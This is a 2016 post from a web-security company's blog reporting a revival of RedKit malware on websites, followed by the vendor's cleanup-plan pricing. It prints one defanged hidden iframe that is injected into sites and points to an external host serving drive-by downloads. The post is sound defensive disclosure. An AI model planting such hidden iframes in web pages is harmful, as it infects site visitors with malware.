Tuesday, April 19, 2016

RedKit Malware Still Alive

RedKit as detected by Online Malware Scanner

Background

Back in 2013, we posted about RedKit infecting significant number of websites. It appears that, three years later, the statistics of the websites submitted to online malware scanner show the revive of this malware among infected websites.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Malware entry

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=hxxp://brg-catalogues[.]com/mzcf.html?j=1886263>

The URL in src of the iframe hosts another ~15 similar HTML pages (mzcf.html) leading to drive-by-download attack. Both domains are not flagged by Google, meaning that they have not yet been blacklisted:

Google report - 1

Google report - 2

Malware clean-up

Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware, Quttera experts are always happy to clean it for you - Malware Monitoring & Cleanup Plans For Websites

No comments:

Malware clean-up and hacking recovery plans. Get your website cleaned and removed from blacklists to prevent traffic loss and protect your visitors!

emergency
249$ /yr
1 domain
Initial Response Time within 4 hrs.
Manual Malware Removal / Full Website Audit
Blacklisting removal
Web Application Firewall (WAF)
Dedicated Malware Analyst
Create Account

economy
149$ /yr
1 domain
Initial Response Time within 12 hrs.
Malware clean-up
Blacklisting removal
24/7 Access to Cybersecurity Professionals
Create Account

more plans

Need help? contactus@quttera.com

Quttera web security blog

Pages

Tuesday, April 19, 2016

RedKit Malware Still Alive

RedKit Malware Still Alive

Background

Malicious action

Malware entry

Malware clean-up

No comments:

Post a Comment